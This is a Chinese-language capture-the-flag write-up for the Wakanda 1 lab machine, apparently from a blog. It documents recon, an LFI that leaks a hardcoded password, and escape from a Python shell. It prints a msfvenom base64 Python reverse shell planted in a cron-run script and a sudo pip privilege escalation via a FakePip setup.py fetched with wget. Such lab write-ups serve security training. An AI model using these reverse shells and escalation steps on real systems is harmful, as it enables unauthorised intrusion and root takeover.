• Write-Up-wakanda-1


    关于

    祖传开头

    信息收集

    • 这里用vm虚拟机可能有一点问题,因为官方的是用vbox虚拟机导出的镜像文件。所以这次使用vbox虚拟机。
    ➜  ~ ip a show dev vboxnet0 
    6: vboxnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
        link/ether 0a:00:27:00:00:00 brd ff:ff:ff:ff:ff:ff
        inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0
           valid_lft forever preferred_lft forever
        inet6 fe80::800:27ff:fe00:0/64 scope link 
           valid_lft forever preferred_lft forever
    ➜  ~ nmap -sn 192.168.56.1/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 20:00 CST
    Nmap scan report for 192.168.56.1
    Host is up (0.0011s latency).
    Nmap scan report for 192.168.56.101
    Host is up (0.00057s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 2.77 seconds
    
    
    • IP是192.168.56.101,除了开放了RPC服务和以前的没什么太大的变化。从Web入手。
    ➜  ~ nmap -T4 -A 192.168.56.101
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 20:01 CST
    Nmap scan report for 192.168.56.101
    Host is up (0.0023s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
    |_http-server-header: Apache/2.4.10 (Debian)
    |_http-title: Vibranium Market
    111/tcp  open  rpcbind 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version   port/proto  service
    |   100000  2,3,4        111/tcp  rpcbind
    |   100000  2,3,4        111/udp  rpcbind
    |   100024  1          40326/tcp  status
    |_  100024  1          54014/udp  status
    3333/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
    |   2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
    |   256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
    |_  256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (ED25519)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
    
    
    • 主页是一个单页,扫一顿也没发现什么。但是F12发现了<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->,访问http://192.168.56.101/?lang=fr时主页多了一写东西。猜想这是切换语言是要包含本地文件,所以就试了试。发现存在LFI漏洞。和以前的pwnlab_init套路一样。
    ➜  ~ nikto -h http://192.168.56.101
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.56.101
    + Target Hostname:    192.168.56.101
    + Target Port:        80
    + Start Time:         2018-10-16 20:06:38 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.10 (Debian)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
    + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
    + OSVDB-3233: /icons/README: Apache default file found.
    + 7535 requests: 0 error(s) and 7 item(s) reported on remote host
    + End Time:           2018-10-16 20:06:57 (GMT8) (19 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    ➜  ~ dirb http://192.168.56.101/
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Tue Oct 16 20:07:03 2018
    URL_BASE: http://192.168.56.101/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.56.101/ ----
    + http://192.168.56.101/admin (CODE:200|SIZE:0)                                       
    + http://192.168.56.101/backup (CODE:200|SIZE:0)                                     
    + http://192.168.56.101/index.php (CODE:200|SIZE:1527)                               
    + http://192.168.56.101/secret (CODE:200|SIZE:0)                                     
    + http://192.168.56.101/server-status (CODE:403|SIZE:302)                             
    + http://192.168.56.101/shell (CODE:200|SIZE:0)                                       
    -----------------
    END_TIME: Tue Oct 16 20:07:05 2018
    DOWNLOADED: 4612 - FOUND: 6
    ➜  ~ 
    
    

    利用LFI漏洞

    • 利用php://filter/convert.base64-encode/resource获取inde页面的源码再base64解码。
    ➜ ~ curl "http://192.168.56.101/?lang=php://filter/convert.base64-encode/resource=index"
    PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=
    
    

    登录SSH

    • 在源码里找到了$password ="Niamey4Ever227!!!" ;//I have to remember it,密码找到了,有在主页里找到了Made by[@mamadou](http://192.168.56.101/#)所以用户名是mamadou。登录ssh。
    ➜  ~ ssh mamadou@192.168.56.101 -p 3333
    The authenticity of host '[192.168.56.101]:3333 ([192.168.56.101]:3333)' can't be established.
    ECDSA key fingerprint is SHA256:X+fXjgH34Ta5l6I4kUSpiVZNBGGBGtjxZxgyU7KCFwk.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '[192.168.56.101]:3333' (ECDSA) to the list of known hosts.
    mamadou@192.168.56.101's password: 
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Fri Aug  3 15:53:29 2018 from 192.168.56.1
    Python 2.7.9 (default, Jun 29 2016, 13:08:31) 
    [GCC 4.9.2] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> 
    
    
    • 但是发现这并不是系统的bash shell而是一个Python的交互命令行。这好办,都不用我输入python -c 'import pty;pty.spawn("/bin/bash")',第一个Flag到手。
    Python 2.7.9 (default, Jun 29 2016, 13:08:31) 
    [GCC 4.9.2] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import pty
    >>> pty.spawn("/bin/bash")
    mamadou@Wakanda1:~$ id
    uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
    mamadou@Wakanda1:~$ 
    mamadou@Wakanda1:~$ ls
    flag1.txt
    mamadou@Wakanda1:~$ cat flag1.txt 
    
    Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
    mamadou@Wakanda1:~$ 
    
    • 在tmp目录发现一个devops用户的一个test文件。
    mamadou@Wakanda1:/tmp$ ls -al
    total 32
    drwxrwxrwt  7 root   root      4096 Oct 16 08:28 .
    drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .font-unix
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .ICE-unix
    -rw-r--r--  1 devops developer    4 Oct 16 08:24 test
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .Test-unix
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .X11-unix
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .XIM-unix
    mamadou@Wakanda1:/tmp$ 
    
    
    • 搜索所以属于devops的文件,发现了一个.antivirus.py文件,然后我又回去看了一下test文件,发现更新时间一直再变,那就有可能是上面的py是会隔一段时间就会执行的。
    mamadou@Wakanda1:/tmp$ find / -user devops 2>/dev/null
    /srv/.antivirus.py
    /tmp/test
    /home/devops
    /home/devops/.bashrc
    /home/devops/.profile
    /home/devops/.bash_logout
    /home/devops/flag2.txt
    mamadou@Wakanda1:/tmp$ 
    
    mamadou@Wakanda1:/srv$ cat .antivirus.py 
    open('/tmp/test','w').write('test')
    mamadou@Wakanda1:/srv$ ls -la
    total 12
    drwxr-xr-x  2 root   root      4096 Aug  1 17:52 .
    drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
    -rw-r--rw-  1 devops developer   36 Aug  1 20:08 .antivirus.py
    mamadou@Wakanda1:/srv$ 
    mamadou@Wakanda1:/tmp$ ls -al
    total 32
    drwxrwxrwt  7 root   root      4096 Oct 16 08:39 .
    drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .font-unix
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .ICE-unix
    -rw-r--r--  1 devops developer    4 Oct 16 08:39 test
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .Test-unix
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .X11-unix
    drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .XIM-unix
    
    
    • 生成msf的Python反弹后门,把代码复制到.antivirus.py 里打开msf监听7777端口坐等shell。
    ➜  ~ msfvenom -p cmd/unix/reverse_python lhost=192.168.56.1 lport=7788 formats py R
    [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    [-] No arch selected, selecting arch: cmd from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 537 bytes
    python -c "exec('aW1wb3J0IHNvY2tldCwgICAgICBzdWJwcm9jZXNzLCAgICAgIG9zICAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjU2LjEiICAgIDsgICAgICAgICBwb3J0PTc3ODggICAgOyAgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QsICAgICAgcG9ydCkpICAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgICAgMCkgICAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgICAgICAxKSAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgIDIpICAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
    
    • 经过漫长的等待,shell终于弹回来了。第二个Flag到手。
    ➜  ~ nc -lvp 7788
    Connection from 192.168.56.101:50517
    id
    uid=1001(devops) gid=1002(developer) groups=1002(developer)
    python -c 'import pty;pty.spawn("/bin/bash")'
    devops@Wakanda1:/$ cd ~
    cd ~
    devops@Wakanda1:~$ ls
    ls
    flag2.txt
    
    devops@Wakanda1:~$ cat flag2.txt
    cat flag2.txt
    Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
    devops@Wakanda1:~$ 
    

    FakePip提权

    • pip可以用sudo而且不用输入密码。
    devops@Wakanda1:~$ sudo -l
    sudo -l
    Matching Defaults entries for devops on Wakanda1:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    
    User devops may run the following commands on Wakanda1:
        (ALL) NOPASSWD: /usr/bin/pip
    devops@Wakanda1:~$ 
    
    • 项目地址:点我,打开setup.py文件把里面的IP改了就可以了。项目里也有详细的教程。
    ➜  FakePip git:(master) ✗ php -S 0.0.0.0:4444
    PHP 7.2.10 Development Server started at Tue Oct 16 21:40:47 2018
    Listening on http://0.0.0.0:4444
    Document root is /home/kali-team/GitHub/FakePip
    Press Ctrl-C to quit.
    [Tue Oct 16 21:41:37 2018] 192.168.56.101:45377 [200]: /setup.py
    
    
    devops@Wakanda1:~$ wget http://192.168.56.1:4444/setup.py
    wget http://192.168.56.1:4444/setup.py
    --2018-10-16 09:41:36--  http://192.168.56.1:4444/setup.py
    Connecting to 192.168.56.1:4444... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 990 [application/octet-stream]
    Saving to: ‘setup.py’
    
    setup.py            100%[=====================>]     990  --.-KB/s   in 0s     
    
    2018-10-16 09:41:36 (81.4 MB/s) - ‘setup.py’ saved [990/990]
    
    devops@Wakanda1:~$ ls
    ls
    flag2.txt  setup.py
    
    
    • 按照项目教程执行pip安装,再用nc监听等shell。
    devops@Wakanda1:~$ sudo /usr/bin/pip install . --upgrade --force-reinstall
    sudo /usr/bin/pip install . --upgrade --force-reinstall
    Unpacking /home/devops
      Running setup.py (path:/tmp/pip-SfNBak-build/setup.py) egg_info for package from file:///home/devops
        
    Installing collected packages: FakePip
      Found existing installation: FakePip 0.0.1
        Uninstalling FakePip:
          Successfully uninstalled FakePip
      Running setup.py install for FakePip
    
    
    • root的Flag到手。
    ➜  FakePip git:(master) ✗ nc -lvp 6666
    Connection from 192.168.56.101:46577
    root@Wakanda1:/tmp/pip-SfNBak-build# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@Wakanda1:/tmp/pip-SfNBak-build# cd    	
    cd
    root@Wakanda1:~# ls
    ls
    root.txt
    root@Wakanda1:~# cat root.txt
    cat root.txt
     _    _.--.____.--._
    ( )=.-":;:;:;;':;:;:;"-._
     \:;:;:;:;:;;:;::;:;:;:
      \:;:;:;:;:;;:;:;:;:;:;
       \:;::;:;:;:;:;::;:;:;:
        \:;:;:;:;:;;:;::;:;:;:
         \:;::;:;:;:;:;::;:;:;:
          \;;:;:_:--:_:_:--:_;:;
           \\_.-"             "-._
            \
             \
              \
               \ Wakanda 1 - by @xMagass
                \
                 \
    
    
    Congratulations You are Root!
    
    821ae63dbe0c573eff8b69d451fb21bc
    
    root@Wakanda1:~# 
    
    
  • 相关阅读:
    Server Tomcat v8.5 Server at localhost failed to start.
    使用bootstrap中的bootstrapValidator,验证ckeditor富文本框不为空
    百度WebUploader上传图片,图片回显编辑,查看
    百度WebUploader上传图片
    做webapp静态页面的一些积累
    ztree插件的使用
    highcharts曲线图
    ajax的表单提交,与传送数据
    一条数据中需要遍历多条数据,页面遍历方法
    在页面中使用拼接字符串的方式显示动态加载的数据
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12211026.html
Copyright © 2020-2023  润新知